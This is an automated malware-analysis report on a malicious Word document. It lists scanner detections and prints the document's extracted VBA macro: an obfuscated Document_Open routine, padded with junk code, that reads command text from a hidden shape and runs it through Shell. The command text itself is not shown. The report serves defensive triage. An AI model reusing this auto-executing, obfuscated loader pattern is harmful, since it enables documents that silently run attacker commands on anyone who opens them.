Verdict: MALICIOUS
Risk score: 272
Heuristics: 9

- ClamAV: Doc.Malware.Generic-6769506-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.Generic-6769506-0.
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings). Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched lines in script:
  `UKCnVzbdRONfKILK = Hex(wtKawEcKYLjOFRJqDDwtVr)`
  `FjiKaiGX = Array(bbcKnYF, czouPLw, oHENQ, [Interaction].Shell(jLijpEEizbT, vrAKX), FndUQW)`
  `Select Case mrXYFXJDVvVUGn`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched lines in script:
  `Attribute VB_Customizable = True`
  `Private Sub Document_open()`
  `On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD).
- Reference to PowerShell (high, SC_STR_POWERSHELL).
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts: 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7993 bytes |

SHA-256: 9fc609b00d16d78d52afb8496d16360fb60f2077fed2116ca3abe73ff05abbfe

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 177 of 212 identifiers look randomly generated (e.g. 'XiLoNtQsMiFtvSSsTLHVpAha'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "IiuvLaRVzrTfN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case azhonwEcoTiauqnUUauBS
Case 275678925
KFOrwJLaNUhzzAztBIjjCbhj = ChrB(190419675 / ChrB(250008113))
lKjUOkCXjZFHTdsRGMrnUVht = mFtjYhOKNZQjzSOzdQTwAMG
Case 60662133
aUlwbQdnbciInKr = 283671402
FDclHtdqrENwsZzkZzNcMlJn = 295934643
End Select
Set qjopGcFDGCjYTaIHkL = qjCfYNMdOlUupsjDt
BwkroSwDBinUEB = Hex(XBnnDQbtwqSmIrfjXOGiMfzv)
Select Case nHYUIHtzYEvJqoaoizKaoD
Case 80474127
qLuiDkLaljGIhdKiwC = ChrB(130539492 / ChrB(331009316))
lZWjICVCzBkvCizNOvo = VXJiSHFofbljNzElXzvhpXm
Case 208773788
MiwNRjHfECOQoOBzjX = 155888272
AhFaLpRAGDzldMFcG = 174463166
End Select
Set siDJuqVijujJAOPU = ZYCbSGZAFdmcIYrGJflw
KkpHhFWuzWNraChYmZX = Hex(JpMiGbVsCrjiXHOoMUlA)
Select Case QXNBTqROhSWERrpLnQzj
Case 75440538
wXlJSNavaGzIGEqjmTEjS = ChrB(102551779 / ChrB(329405134))
MZQhFBImUjaqPJXDn = rQFIllVHddbfShZWztztqZ
Case 327197175
oZdzRdwBsfXhKDni = 79678162
XiLoNtQsMiFtvSSsTLHVpAha = 255344420
End Select
Set JrLtFShsCSBAMkiYRSvwjF = RkcXqIWzkBakZhSYm
DPArTwXmQjPfoCDd = Hex(JcvqjfVQwlzJrwtImjpOaQd)
Set sniFN = Shapes("vVlIKOOjmbQjRA").TextFrame
Select Case TCNjMBShSPwwjcssOlz
Case 26554376
UuXElJIiUwiSKXpZc = ChrB(158579645 / ChrB(81420610))
jlaBVhjNrkJRYN = IpiarKCwRNdYFCSmNmDhiTVj
Case 27495905
vnkoQtzXjjzzUpinJnr = 56877973
KYwwiVfRoTvWRPOOczja = 219488446
End Select
Set joPRNCvKirvwlPmrmY = GrPCaDaQZjqIhwopJ
MHcVilEbVizclKLIaiTm = Hex(OmmVirjNzwacLZRplNizzi)
Select Case RkRzirbQSWHwwEYBHrWscO
Case 72346412
ljSPQmDwTzLPRu = ChrB(314880036 / ChrB(68391382))
aXbOYjvzYuZInODZP = CYLzfSIdwsJkNvLcB
Case 280329133
nNzXSssipjjIpCftlEbsI = 37266391
hCnojdwKMMpcBCBtGmoTwPkT = 222872207
End Select
Set CZYZwbhRSUiEMAtVXvAai = kLUFUmwSSUGwbWmnOOujkj
BanZbsoSHDLpMEsGu = Hex(ABKwNYXikjmfuGDwTi)
Select Case qJBKffiVYsPRRKf
Case 120120799
VVnKvJwIjSVKHvDvGM = ChrB(230228574 / ChrB(40841106))
BzijMXWvIWQHCniizuzFCwNJ = RzLWKwwMYTYJajma
Case 83966372
vECEIZQISjAvDkUYuZK = 166158598
YTvdTFVXKMfpaREIMpmGCjML = 192941671
End Select
Set ooCpNPnaXkHboUulH = VFdSQPhkXTvrHkADQh
VzPBzuTBlASLQYppXn = Hex(YnHcrUifdWblDMRlXG)
Select Case clMPrwVuCGhtfiBSiUbRh
Case 228607912
tvUtFJzTEDELETbiaNR = ChrB(232948096 / ChrB(221033844))
sZXSIRfJvCuMSUXEPkFmcpaW = zDpADQzrwCvVnBfouICRrAGH
Case 143888453
jiuSCwBVJOpJrmuUURbjcjZw = 224932875
YEFwwiiFkVzfzzTRrRzlR = 103958260
End Select
Set XjpfmWwEwkVZwQLRGi = CZXoSiPKsHzwPIiiRHCsjn
BvdXXAfAsGfNzzsXB = Hex(LEzwnGQOiuKDmCOJWs)
jLijpEEizbT = sniFN.TextRange.Text + WXhVOp + wNwjFH + RvcPuJ + POwwn + TKzbZLt + wMMbwV + kXBjW + GilTq + fzMJFwh
Select Case mMkHqcaVwVZWZqZlToaj
Case 32633953
hYOWuajwirwtIOji = ChrB(208668558 / ChrB(88542475))
rYpHacUiPnlnhZafLt = iAlzniafhKEkINLNns
Case 116106184
uZvUJwDPUiiUpMiWFYCYAw = 257645422
KDdaVLnnuFZJERqqiL = 75790287
End Select
Set bjvwipIOpsnzlbJFTdtIuvak = USniLuplnsbHjrjDZzBRcX
IkWBRDFjILKNWVfdwzMw = Hex(iwmlMFVzZSKzoizpsXiiL)
Select Case jNMCJMQcDpPEURpXd
Case 299161030
ltrBtSfrMAzJrAQcBcN = ChrB(19360414 / ChrB(59813600))
sVInjoMpCvrnjWsM = kiVEcDfXEDonvQqQZ
Case 5707373
sGlrfWwESETtjpJdYn = 54106878
ScQckXBGfBXHWWTMw = 257126558
End Select
Set hdzNSkJEwlmRcQkDQpJGIU = YQjMXMVwilwanTOzraSCUsj
qlTCWojhMmazlYmrdpHfdqw = Hex(CsSfpSWfhlVltTaqFRNBs)
Select Case wJSwUEaSlwBLPocPRT
Case 192917291
XttPzWJcCYzmfhD = ChrB(272878272 / ChrB(285705846))
zVmJJsjVjDmcZczPz = PCzzvzQNzOjikm
Case 160152315
VHSOjAjbnFqZzXmPkAZoSAZo = 296032756
tUpBSzEaGszjTPVXKqHqOcbR = 330248202
End Select
Set NjjVhdVnHMmlnqVYQuRAj = SvpjhCiRsXDimUul
UOjHJkYCQVpLhzzD = Hex(QkfzvTFqTOiEEA)
Select Case dSkzciEWMbrLfzt
Case 248780737
WKkTHCaIFNtEsmm = ChrB(147600130 / ChrB(233991543))
HtSuhzuvbjQzXFIPYta = WQJpXULRUoEovWlrqbdnZL
Case 178554002
rHpnvdNsvzFrkdXMlcbmbbC = 12268292
RZzQmMKpPzQiXVqaMt = 330968999
End Select
Set uHNEQBwkoSQFoUiEQ = IlvCVfGhOGkLPiDlYJM
zkPZAwhKqCrmKkkNVslhzjn = Hex(zdCiBCvUsXcYVVBYwvqMPwA)
Select Case oKuuYXzYuWPwAqZfL
Case 319660477
vFMikOpUiwOzzMXbmThnD = ChrB(335370618 / ChrB(144784617))
IjoBPTYCaACJcbJfjCOcf = RldPmMdJiwjcaBanEP
Case 154424471
YzJNwKJCDAktElRC = 162295430
jMYRRGaABHEvzw = 34165099
End Select
Set wUcPQcDbFiMqYpkYOE = LnHfDnwJBzHCloknzaIkD
zLjukcLXjhtPtfq = Hex(YcRTCdzfaBnCnzFUfCqvvJ)
Const vrAKX = 0
Select Case uwWhrpUhntizkk
Case 22548405
BPlGXPhIrhOaGEFmC = ChrB(151482028 / ChrB(278514111))
TNBZFNhfdYmUESDPKSifOOq = btbjnvwNuIwoOMBJ
Case 217410483
iSvtWnApcksKjF = 149915821
zLmwrhbZZvWPBwQVwLjXPi = 150184725
End Select
Set jwTMUjcrRXOpXiLwrVUbRk = dTXMUVzbPowOsOPEpSfzij
zPAnjtNvWwLpszXIVSw = Hex(BYTSibRiJlmJttZwTiThBtcQ)
Select Case SHrEfdYisUWjSoS
Case 189731185
wwzQYnIEamfXZDKkIiAEzFf = ChrB(212052593 / ChrB(193214441))
iFaITBXIohOptUjzF = sKTRLvJKRYsrQTmFICiRTdz
Case 108322425
dVSkjVAAonSzMufw = 62151140
zQzQvDoLjVnXPKCDiZqZl = 20747449
End Select
Set rbjTGwIwSJuAAQMaPwUpfMR = IwIMFHjzwXFoPjhPXWV
UKCnVzbdRONfKILK = Hex(wtKawEcKYLjOFRJqDDwtVr)
FjiKaiGX = Array(bbcKnYF, czouPLw, oHENQ, [Interaction].Shell(jLijpEEizbT, vrAKX), FndUQW)
Select Case mrXYFXJDVvVUGn
Case 217701036
mdIfQATYLJjodERA = ChrB(99164205 / ChrB(221415947))
zjdwWSlFjXitETW = FLzmmXzMvrUZQiUFYfjhI
Case 201539321
MfunAdPbUGULpRvVajRDiz = 76895777
BCdVYkpbbZkHsjzjfPATwT = 209128545
End Select
Set dKJArbHOTFlzzuDkRskPhn = qhhXOzssiWqrNapkzSV
nwBjlMPBDjQFpiTSJDsRaM = Hex(aJDpJcHkzLzorj)
Select Case fbSsznqLlfkQij
Case 132924690
EpGCjMDSPKumDjijnNKI = ChrB(110832803 / ChrB(201684112))
jhpYWVQKonJIHwU = TYAdosDIEBDcQYLMZka
Case 137023389
njzzAGztXXiSprkQBQnihUV = 118120736
tQbzjWXAhfrDdomDOjdVJb = 213434617
End Select
Set vYUnqJTKfLGpYwoBKSI = sNXbAaSnswiRkABL
kJYMhXShzfSscK = Hex(TUiiAsnQqfSijoEXvdwaJkz)
Select Case ZLVrdvkLwWCwjVSqzwXILBqi
Case 341363923
ndiifcoKjLUpqLwwt = ChrB(215212664 / ChrB(218352198))
oLohIvBMkYUmsKIGcTqZKZ = HVKGLKPHJBMibpBVkacZKr
Case 220763287
fDrTaqHdOYhLwppCVRKlfjjR = 180975825
FzhAbQoNbISvhTtjPCIpWvkZ = 27631994
End Select
Set jvRwWasbkIvOzQXlOhjZjqr = RdIlbKOHvhjsvcmsDFjlnAFr
lhDpiJqEVjsRGzZtn = Hex(PhiplvrWiGGIQXRTq)
Select Case QZYwOHihHfujCT
Case 58937384
JqMfYbKwNIijwVzjGGhjHnj = ChrB(37312444 / ChrB(222894983))
sHOQjBszizCJdpPbjFcBil = OZwmZlWGHzliChwcdozrw
Case 199746092
drTfEdcjEGZArkPSOIsuMrHM = 303175502
dzNjujjcTvFFSciRhbchFr = 92820220
End Select
Set kjFjklkHlRAdSVMpQO = TMIpPQuKfjMhllrwK
AshKwUBcBwLOnQrauIct = Hex(TpaFXYjOraWBLQWjJOnonP)
End Sub
```